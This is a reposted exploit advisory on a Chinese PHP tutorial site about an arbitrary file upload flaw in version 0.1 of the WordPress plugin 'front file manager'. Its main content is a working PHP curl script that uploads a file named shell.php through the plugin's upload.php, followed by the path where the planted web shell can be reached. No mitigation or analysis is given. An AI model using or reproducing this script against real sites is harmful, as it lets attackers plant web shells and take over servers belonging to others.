来源:自学PHP网 时间:2015-04-17 14:11 作者: 阅读:次
[导读] 标题: Wordpress front file manager 0.1 Arbitrary File Upload作者: Adrien Thierrywww.2cto.com http://www.webikon.sk/en下载地址: http://downloads.wordpress.org/plugin/front-file-manager.......
标题: Wordpress front file manager 0.1 Arbitrary File Upload
作者: Adrien Thierry www.2cto.com http://www.webikon.sk/en 下载地址: http://downloads.wordpress.org/plugin/front-file-manager.zip 影响版本: 0.1 upload.php页面存在远程文件上传缺陷. 代码 : <?php $u="whatyouwant.php"; $c = curl_init("http:// www.2cto.com /wp-content/plugins/front-file-manager/upload.php"); curl_setopt($c, CURLOPT_POST, true); curl_setopt($c, CURLOPT_POSTFIELDS, array('file'=>"@$u", 'name'=>"shell.php")); curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); $e = curl_exec($c); curl_close($c); echo $e; ?> Shell上传后位置: http://www.2cto.com /wp-content/plugins/uploads/2012/06/shell.php (http://www.2cto.com /wp-content/plugins/uploads/[YYYY]/[MM]/shell.php |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com